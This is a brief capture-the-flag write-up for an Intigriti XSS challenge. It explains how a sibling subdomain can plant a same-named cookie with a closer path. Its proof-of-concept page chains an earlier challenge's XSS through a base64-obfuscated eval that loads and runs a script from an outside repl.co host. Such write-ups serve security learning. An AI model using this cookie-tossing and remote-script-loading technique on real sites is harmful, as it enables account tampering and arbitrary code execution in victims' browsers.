Unintended way to solve the challenge
Two things you need to Know (Gotcha’s):
- Any subdomain can set cookie for all subdomains of it’s parent domain.
- If two cookie with same name exists, the cookie with closest path is prefered.
##Steps:
-
Using any previous XSS on intigritii challenges create a cookie named username set it’s domain attribute as intigriti.io and path attribute as /challenge/cooking.html
-
Redirect to https://challenge-0821.intigriti.io/
POC code:
<!DOCTYPE html>
<html>
<body>
<script>
location = "https://javascript.challenge-0121.intigriti.io/?r=j%26%23x41;vascript:eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTt4LnNyYz0iaHR0cHM6Ly9jeWJlcnBvc3NpYmxlYXhpcy5jeXBoM3IxMzM3LnJlcGwuY28vc2NyaXB0LmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==`));//%0aid=origin";
</script>
</body>
</html>
Resource
https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers